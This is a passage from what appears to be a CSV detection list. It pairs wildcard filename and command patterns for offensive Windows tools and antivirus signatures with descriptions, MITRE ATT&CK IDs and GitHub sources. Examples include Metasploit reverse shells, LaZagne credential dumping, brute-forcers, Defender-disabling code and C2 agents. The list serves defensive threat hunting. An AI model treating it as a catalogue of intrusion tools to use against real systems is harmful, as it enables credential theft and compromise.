security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_winexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win32kLeaker.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win64.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Win64/IceId*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Win64/Mikatz*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","mimikatz signatures","10","10","N/A","N/A","N/A","N/A" +"*Win7Elevate.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win7ElevateDll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*WinBruteLogon* -v -u*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dpr*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dproj*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.exe*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.res*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - 
TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinCreds.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*windapsearch --dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*windapsearch.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"*windapsearch_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*windapsearch_py2.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD 
Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"*windapsearch-master*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"*WinDefenderKiller*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*winDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*WindfarmDynamite.cdproj*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.exe*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). 
Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.sln*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Windows Exploit*","offensive_tool_keyword","_","windows exploit keyword often used in poc exploit github repo or could be a file name or folder","T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*windows*lsa_secrets.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Windows.Hacktool.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*windows/c_payload_util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Windows/lazagne.spec*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*windows/shell_reverse_tcp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows/x64/meterpreter_reverse_tcp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*windows_agent/asm/x64/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/asm/x86/alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/dll_main.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/exe_main.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/win_*.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/win_named_pipe.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - 
TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_agent/win_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_autologin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows_console_interceptor*dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_console_interceptor*exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_console_interceptor*interceptor.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*windows_credentials.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*windows_key.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*windows_recon.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*windows_sam_hivenightmare.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows_sam_hivenightmare.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*windows10_ntfs_crash_dos*","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. 
It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","6","589","137","2020-04-28T18:11:52Z","2018-04-27T19:31:59Z" +"*Windows7-BypassLogon-Screen.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*WindowsEnum -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*WindowsExploits*","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1213","565","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z" +"*windows-exploit-suggester.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*windows-forkbomb.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*WindowsLies*BlockWindows*","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","7","644","109","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z" +"*Windows-Post-Exploitation*","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. 
could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","5","492","122","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z" +"*windows-privesc-check*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*Windows-Privilege-Escalation*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" +"*WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
